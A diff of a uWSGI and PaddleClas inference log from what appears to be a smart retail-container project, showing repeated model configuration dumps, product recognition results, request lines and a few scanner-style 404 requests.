+2022-02-14 08:52:28 INFO: NormalizeImage : +2022-02-14 08:52:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:28 INFO: order : +2022-02-14 08:52:28 INFO: scale : 0.00392157 +2022-02-14 08:52:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:28 INFO: ToCHWImage : None +Inference: 378.4329891204834 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6235545}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 20/35] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:59:09 2021] POST /reference_client/ => generated 114 bytes in 6021 msecs (HTTP/1.1 200) 5 headers in 158 bytes (5 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1138/1332] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:52:26 2022] POST /reference_client/ => generated 98 bytes in 2967 msecs (HTTP/1.1 200) 5 headers in 157 bytes (17 switches on core 0) req -2021-11-03 04:59:23 INFO: +2022-02-14 08:52:46 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2882,78 +4994,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:59:23 INFO: DetPostProcess : -2021-11-03 04:59:23 INFO: DetPreProcess : -2021-11-03 04:59:23 INFO: transform_ops : -2021-11-03 04:59:23 INFO: DetResize : -2021-11-03 04:59:23 INFO: interp : 2 -2021-11-03 04:59:23 INFO: keep_ratio : False -2021-11-03 04:59:23 INFO: target_size : [640, 640] -2021-11-03 04:59:23 INFO: DetNormalizeImage : -2021-11-03 04:59:23 INFO: is_scale : True -2021-11-03 04:59:23 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:23 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:23 INFO: DetPermute : -2021-11-03 04:59:23 INFO: Global : -2021-11-03 04:59:23 INFO: batch_size : 1 -2021-11-03 04:59:23 INFO: cpu_num_threads : 10 -2021-11-03 04:59:23 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:59:23 INFO: enable_benchmark : True -2021-11-03 04:59:23 INFO: enable_mkldnn : True -2021-11-03 04:59:23 INFO: enable_profile : False -2021-11-03 04:59:23 INFO: gpu_mem : 8000 -2021-11-03 04:59:23 INFO: image_shape : [3, 640, 640] -2021-11-03 04:59:23 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:59:23 INFO: ir_optim : True -2021-11-03 04:59:23 INFO: labe_list : ['foreground'] -2021-11-03 04:59:23 INFO: max_det_results : 5 -2021-11-03 04:59:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:59:23 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:59:23 INFO: threshold : 0.2 -2021-11-03 04:59:23 INFO: use_fp16 : False -2021-11-03 04:59:23 INFO: use_gpu : False -2021-11-03 04:59:23 INFO: use_tensorrt : False -2021-11-03 04:59:23 INFO: IndexProcess : -2021-11-03 04:59:23 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:59:23 INFO: return_k : 5 -2021-11-03 04:59:23 INFO: score_thres : 0.5 -2021-11-03 04:59:23 INFO: RecPostProcess : None -2021-11-03 04:59:23 INFO: RecPreProcess : -2021-11-03 04:59:23 INFO: transform_ops : -2021-11-03 04:59:23 INFO: ResizeImage : -2021-11-03 04:59:23 INFO: size : 224 -2021-11-03 04:59:23 INFO: NormalizeImage : -2021-11-03 04:59:23 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:23 INFO: order : -2021-11-03 04:59:23 INFO: scale : 0.00392157 -2021-11-03 04:59:23 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:23 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2292.2866344451904 ms per batch image -[{'bbox': [25, 312, 392, 479], 'rec_docs': '江小白', 'rec_scores': 0.5136571}] -{'bbox': [25, 312, 392, 479], 'rec_docs': '江小白', 'rec_scores': 0.5136571} +2022-02-14 08:52:46 INFO: DetPostProcess : +2022-02-14 08:52:46 INFO: DetPreProcess : +2022-02-14 08:52:46 INFO: transform_ops : +2022-02-14 08:52:46 INFO: DetResize : +2022-02-14 08:52:46 INFO: interp : 2 +2022-02-14 08:52:46 INFO: keep_ratio : False +2022-02-14 08:52:46 INFO: target_size : [640, 640] +2022-02-14 08:52:46 INFO: DetNormalizeImage : +2022-02-14 08:52:46 INFO: is_scale : True +2022-02-14 08:52:46 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:46 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:46 INFO: DetPermute : +2022-02-14 08:52:46 INFO: Global : +2022-02-14 08:52:46 INFO: batch_size : 1 +2022-02-14 08:52:46 INFO: cpu_num_threads : 1 +2022-02-14 08:52:46 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:52:46 INFO: enable_benchmark : True +2022-02-14 08:52:46 INFO: enable_mkldnn : True +2022-02-14 08:52:46 INFO: enable_profile : False +2022-02-14 08:52:46 INFO: gpu_mem : 8000 +2022-02-14 08:52:46 INFO: image_shape : [3, 640, 640] +2022-02-14 08:52:46 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:52:46 INFO: ir_optim : True +2022-02-14 08:52:46 INFO: labe_list : ['foreground'] +2022-02-14 08:52:46 INFO: max_det_results : 5 +2022-02-14 08:52:46 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:52:46 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:52:46 INFO: threshold : 0.2 +2022-02-14 08:52:46 INFO: use_fp16 : False +2022-02-14 08:52:46 INFO: use_gpu : False +2022-02-14 08:52:46 INFO: use_tensorrt : False +2022-02-14 08:52:46 INFO: IndexProcess : +2022-02-14 08:52:46 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:52:46 INFO: return_k : 5 +2022-02-14 08:52:46 INFO: score_thres : 0.5 +2022-02-14 08:52:46 INFO: RecPostProcess : None +2022-02-14 08:52:46 INFO: RecPreProcess : +2022-02-14 08:52:46 INFO: transform_ops : +2022-02-14 08:52:46 INFO: ResizeImage : +2022-02-14 08:52:46 INFO: size : 224 +2022-02-14 08:52:46 INFO: NormalizeImage : +2022-02-14 08:52:46 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:46 INFO: order : +2022-02-14 08:52:46 INFO: scale : 0.00392157 +2022-02-14 08:52:46 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:46 INFO: ToCHWImage : None +Inference: 374.09257888793945 ms per batch image +[] 234 -["{'bbox': [25, 312, 392, 479], 'rec_docs': '江小白', 'rec_scores': 0.5136571}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 14/36] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:59:22 2021] POST /reference_client/ => generated 114 bytes in 5835 msecs (HTTP/1.1 200) 5 headers in 158 bytes (11 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19144|app: 0|req: 18/1333] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:52:44 2022] POST /reference_client/ => generated 98 bytes in 2907 msecs (HTTP/1.1 200) 5 headers in 157 bytes (25 switches on core 0) req -2021-11-03 04:59:36 INFO: +2022-02-14 08:52:54 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2963,78 +5056,66 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:59:36 INFO: DetPostProcess : -2021-11-03 04:59:36 INFO: DetPreProcess : -2021-11-03 04:59:36 INFO: transform_ops : -2021-11-03 04:59:36 INFO: DetResize : -2021-11-03 04:59:36 INFO: interp : 2 -2021-11-03 04:59:36 INFO: keep_ratio : False -2021-11-03 04:59:36 INFO: target_size : [640, 640] -2021-11-03 04:59:36 INFO: DetNormalizeImage : -2021-11-03 04:59:36 INFO: is_scale : True -2021-11-03 04:59:36 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:36 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:36 INFO: DetPermute : -2021-11-03 04:59:36 INFO: Global : -2021-11-03 04:59:36 INFO: batch_size : 1 -2021-11-03 04:59:36 INFO: cpu_num_threads : 10 -2021-11-03 04:59:36 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:59:36 INFO: enable_benchmark : True -2021-11-03 04:59:36 INFO: enable_mkldnn : True -2021-11-03 04:59:36 INFO: enable_profile : False -2021-11-03 04:59:36 INFO: gpu_mem : 8000 -2021-11-03 04:59:36 INFO: image_shape : [3, 640, 640] -2021-11-03 04:59:36 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:59:36 INFO: ir_optim : True -2021-11-03 04:59:36 INFO: labe_list : ['foreground'] -2021-11-03 04:59:36 INFO: max_det_results : 5 -2021-11-03 04:59:36 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:59:36 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:59:36 INFO: threshold : 0.2 -2021-11-03 04:59:36 INFO: use_fp16 : False -2021-11-03 04:59:36 INFO: use_gpu : False -2021-11-03 04:59:36 INFO: use_tensorrt : False -2021-11-03 04:59:36 INFO: IndexProcess : -2021-11-03 04:59:36 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:59:36 INFO: return_k : 5 -2021-11-03 04:59:36 INFO: score_thres : 0.5 -2021-11-03 04:59:36 INFO: RecPostProcess : None -2021-11-03 04:59:36 INFO: RecPreProcess : -2021-11-03 04:59:36 INFO: transform_ops : -2021-11-03 04:59:36 INFO: ResizeImage : -2021-11-03 04:59:36 INFO: size : 224 -2021-11-03 04:59:36 INFO: NormalizeImage : -2021-11-03 04:59:36 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:36 INFO: order : -2021-11-03 04:59:36 INFO: scale : 0.00392157 -2021-11-03 04:59:36 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:36 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2478.148937225342 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5989687}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5989687} +2022-02-14 08:52:54 INFO: DetPostProcess : +2022-02-14 08:52:54 INFO: DetPreProcess : +2022-02-14 08:52:54 INFO: transform_ops : +2022-02-14 08:52:54 INFO: DetResize : +2022-02-14 08:52:54 INFO: interp : 2 +2022-02-14 08:52:54 INFO: keep_ratio : False +2022-02-14 08:52:54 INFO: target_size : [640, 640] +2022-02-14 08:52:54 INFO: DetNormalizeImage : +2022-02-14 08:52:54 INFO: is_scale : True +2022-02-14 08:52:54 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:54 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:54 INFO: DetPermute : +2022-02-14 08:52:54 INFO: Global : +2022-02-14 08:52:54 INFO: batch_size : 1 +2022-02-14 08:52:54 INFO: cpu_num_threads : 1 +2022-02-14 08:52:54 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:52:54 INFO: enable_benchmark : True +2022-02-14 08:52:54 INFO: enable_mkldnn : True +2022-02-14 08:52:54 INFO: enable_profile : False +2022-02-14 08:52:54 INFO: gpu_mem : 8000 +2022-02-14 08:52:54 INFO: image_shape : [3, 640, 640] +2022-02-14 08:52:54 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:52:54 INFO: ir_optim : True +2022-02-14 08:52:54 INFO: labe_list : ['foreground'] +2022-02-14 08:52:54 INFO: max_det_results : 5 +2022-02-14 08:52:54 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:52:54 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:52:54 INFO: threshold : 0.2 +2022-02-14 08:52:54 INFO: use_fp16 : False +2022-02-14 08:52:54 INFO: use_gpu : False +2022-02-14 08:52:54 INFO: use_tensorrt : False +2022-02-14 08:52:54 INFO: IndexProcess : +2022-02-14 08:52:54 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:52:54 INFO: return_k : 5 +2022-02-14 08:52:54 INFO: score_thres : 0.5 +2022-02-14 08:52:54 INFO: RecPostProcess : None +2022-02-14 08:52:54 INFO: RecPreProcess : +2022-02-14 08:52:54 INFO: transform_ops : +2022-02-14 08:52:54 INFO: ResizeImage : +2022-02-14 08:52:54 INFO: size : 224 +2022-02-14 08:52:54 INFO: NormalizeImage : +2022-02-14 08:52:54 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:54 INFO: order : +2022-02-14 08:52:54 INFO: scale : 0.00392157 +2022-02-14 08:52:54 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:54 INFO: ToCHWImage : None +Inference: 372.9250431060791 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5989687}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 21/37] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 04:59:35 2021] POST /reference_client/ => generated 114 bytes in 6470 msecs (HTTP/1.1 200) 5 headers in 158 bytes (15 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1139/1334] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:52:53 2022] POST /reference_client/ => generated 98 bytes in 2972 msecs (HTTP/1.1 200) 5 headers in 157 bytes (25 switches on core 0) +[pid: 19148|app: 0|req: 1140/1335] 39.99.143.235 () {28 vars in 307 bytes} [Mon Feb 14 08:53:07 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 44/1336] 39.99.143.235 () {32 vars in 409 bytes} [Mon Feb 14 08:53:07 2022] GET /text4041644828787 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 45/1337] 39.99.143.235 () {32 vars in 385 bytes} [Mon Feb 14 08:53:07 2022] GET /HNAP1 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 4/1338] 39.99.143.235 () {34 vars in 411 bytes} [Mon Feb 14 08:53:07 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 90/1339] 39.99.143.235 () {32 vars in 395 bytes} [Mon Feb 14 08:53:07 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 91/1340] 39.99.143.235 () {36 vars in 463 bytes} [Mon Feb 14 08:53:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 92/1341] 39.99.143.235 () {34 vars in 414 bytes} [Mon Feb 14 08:53:19 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 05:00:02 INFO: +2022-02-14 08:54:29 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -3044,80 +5125,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 05:00:02 INFO: DetPostProcess : -2021-11-03 05:00:02 INFO: DetPreProcess : -2021-11-03 05:00:02 INFO: transform_ops : -2021-11-03 05:00:02 INFO: DetResize : -2021-11-03 05:00:02 INFO: interp : 2 -2021-11-03 05:00:02 INFO: keep_ratio : False -2021-11-03 05:00:02 INFO: target_size : [640, 640] -2021-11-03 05:00:02 INFO: DetNormalizeImage : -2021-11-03 05:00:02 INFO: is_scale : True -2021-11-03 05:00:02 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:00:02 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:00:02 INFO: DetPermute : -2021-11-03 05:00:02 INFO: Global : -2021-11-03 05:00:02 INFO: batch_size : 1 -2021-11-03 05:00:02 INFO: cpu_num_threads : 10 -2021-11-03 05:00:02 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 05:00:02 INFO: enable_benchmark : True -2021-11-03 05:00:02 INFO: enable_mkldnn : True -2021-11-03 05:00:02 INFO: enable_profile : False -2021-11-03 05:00:02 INFO: gpu_mem : 8000 -2021-11-03 05:00:02 INFO: image_shape : [3, 640, 640] -2021-11-03 05:00:02 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 05:00:02 INFO: ir_optim : True -2021-11-03 05:00:02 INFO: labe_list : ['foreground'] -2021-11-03 05:00:02 INFO: max_det_results : 5 -2021-11-03 05:00:02 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 05:00:02 INFO: rec_nms_thresold : 0.05 -2021-11-03 05:00:02 INFO: threshold : 0.2 -2021-11-03 05:00:02 INFO: use_fp16 : False -2021-11-03 05:00:02 INFO: use_gpu : False -2021-11-03 05:00:02 INFO: use_tensorrt : False -2021-11-03 05:00:02 INFO: IndexProcess : -2021-11-03 05:00:02 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 05:00:02 INFO: return_k : 5 -2021-11-03 05:00:02 INFO: score_thres : 0.5 -2021-11-03 05:00:02 INFO: RecPostProcess : None -2021-11-03 05:00:02 INFO: RecPreProcess : -2021-11-03 05:00:02 INFO: transform_ops : -2021-11-03 05:00:02 INFO: ResizeImage : -2021-11-03 05:00:02 INFO: size : 224 -2021-11-03 05:00:02 INFO: NormalizeImage : -2021-11-03 05:00:02 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:00:02 INFO: order : -2021-11-03 05:00:02 INFO: scale : 0.00392157 -2021-11-03 05:00:02 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:00:02 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2300.5378246307373 ms per batch image -[{'bbox': [54, 8, 369, 476], 'rec_docs': '江小白', 'rec_scores': 0.6193079}] -{'bbox': [54, 8, 369, 476], 'rec_docs': '江小白', 'rec_scores': 0.6193079} +2022-02-14 08:54:29 INFO: DetPostProcess : +2022-02-14 08:54:29 INFO: DetPreProcess : +2022-02-14 08:54:29 INFO: transform_ops : +2022-02-14 08:54:29 INFO: DetResize : +2022-02-14 08:54:29 INFO: interp : 2 +2022-02-14 08:54:29 INFO: keep_ratio : False +2022-02-14 08:54:29 INFO: target_size : [640, 640] +2022-02-14 08:54:29 INFO: DetNormalizeImage : +2022-02-14 08:54:29 INFO: is_scale : True +2022-02-14 08:54:29 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:54:29 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:54:29 INFO: DetPermute : +2022-02-14 08:54:29 INFO: Global : +2022-02-14 08:54:29 INFO: batch_size : 1 +2022-02-14 08:54:29 INFO: cpu_num_threads : 1 +2022-02-14 08:54:29 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:54:29 INFO: enable_benchmark : True +2022-02-14 08:54:29 INFO: enable_mkldnn : True +2022-02-14 08:54:29 INFO: enable_profile : False +2022-02-14 08:54:29 INFO: gpu_mem : 8000 +2022-02-14 08:54:29 INFO: image_shape : [3, 640, 640] +2022-02-14 08:54:29 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:54:29 INFO: ir_optim : True +2022-02-14 08:54:29 INFO: labe_list : ['foreground'] +2022-02-14 08:54:29 INFO: max_det_results : 5 +2022-02-14 08:54:29 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:54:29 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:54:29 INFO: threshold : 0.2 +2022-02-14 08:54:29 INFO: use_fp16 : False +2022-02-14 08:54:29 INFO: use_gpu : False +2022-02-14 08:54:29 INFO: use_tensorrt : False +2022-02-14 08:54:29 INFO: IndexProcess : +2022-02-14 08:54:29 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:54:29 INFO: return_k : 5 +2022-02-14 08:54:29 INFO: score_thres : 0.5 +2022-02-14 08:54:29 INFO: RecPostProcess : None +2022-02-14 08:54:29 INFO: RecPreProcess : +2022-02-14 08:54:29 INFO: transform_ops : +2022-02-14 08:54:29 INFO: ResizeImage : +2022-02-14 08:54:29 INFO: size : 224 +2022-02-14 08:54:29 INFO: NormalizeImage : +2022-02-14 08:54:29 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:54:29 INFO: order : +2022-02-14 08:54:29 INFO: scale : 0.00392157 +2022-02-14 08:54:29 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:54:29 INFO: ToCHWImage : None +Inference: 373.19421768188477 ms per batch image +[] 234 -["{'bbox': [54, 8, 369, 476], 'rec_docs': '江小白', 'rec_scores': 0.6193079}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 15/38] 210.51.42.176 () {34 vars in 430 bytes} [Wed Nov 3 05:00:01 2021] POST /reference_client/ => generated 114 bytes in 6162 msecs (HTTP/1.1 200) 5 headers in 158 bytes (8 switches on core 0) -[pid: 32765|app: 0|req: 22/39] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 05:02:11 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 16/40] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 05:02:12 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19145|app: 0|req: 18/1342] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:54:28 2022] POST /reference_client/ => generated 98 bytes in 2954 msecs (HTTP/1.1 200) 5 headers in 157 bytes (11 switches on core 0) req -2021-11-03 05:06:32 INFO: +2022-02-14 08:54:35 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -3127,78 +5187,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 05:06:32 INFO: DetPostProcess : -2021-11-03 05:06:32 INFO: DetPreProcess : -2021-11-03 05:06:32 INFO: transform_ops : -2021-11-03 05:06:32 INFO: DetResize : -2021-11-03 05:06:32 INFO: interp : 2 -2021-11-03 05:06:32 INFO: keep_ratio : False -2021-11-03 05:06:32 INFO: target_size : [640, 640] -2021-11-03 05:06:32 INFO: DetNormalizeImage : -2021-11-03 05:06:32 INFO: is_scale : True -2021-11-03 05:06:32 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:06:32 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:06:32 INFO: DetPermute : -2021-11-03 05:06:32 INFO: Global : -2021-11-03 05:06:32 INFO: batch_size : 1 -2021-11-03 05:06:32 INFO: cpu_num_threads : 10 -2021-11-03 05:06:32 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 05:06:32 INFO: enable_benchmark : True -2021-11-03 05:06:32 INFO: enable_mkldnn : True -2021-11-03 05:06:32 INFO: enable_profile : False -2021-11-03 05:06:32 INFO: gpu_mem : 8000 -2021-11-03 05:06:32 INFO: image_shape : [3, 640, 640] -2021-11-03 05:06:32 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 05:06:32 INFO: ir_optim : True -2021-11-03 05:06:32 INFO: labe_list : ['foreground'] -2021-11-03 05:06:32 INFO: max_det_results : 5 -2021-11-03 05:06:32 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 05:06:32 INFO: rec_nms_thresold : 0.05 -2021-11-03 05:06:32 INFO: threshold : 0.2 -2021-11-03 05:06:32 INFO: use_fp16 : False -2021-11-03 05:06:32 INFO: use_gpu : False -2021-11-03 05:06:32 INFO: use_tensorrt : False -2021-11-03 05:06:32 INFO: IndexProcess : -2021-11-03 05:06:32 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 05:06:32 INFO: return_k : 5 -2021-11-03 05:06:32 INFO: score_thres : 0.5 -2021-11-03 05:06:32 INFO: RecPostProcess : None -2021-11-03 05:06:32 INFO: RecPreProcess : -2021-11-03 05:06:32 INFO: transform_ops : -2021-11-03 05:06:32 INFO: ResizeImage : -2021-11-03 05:06:32 INFO: size : 224 -2021-11-03 05:06:32 INFO: NormalizeImage : -2021-11-03 05:06:32 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:06:32 INFO: order : -2021-11-03 05:06:32 INFO: scale : 0.00392157 -2021-11-03 05:06:32 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:06:32 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 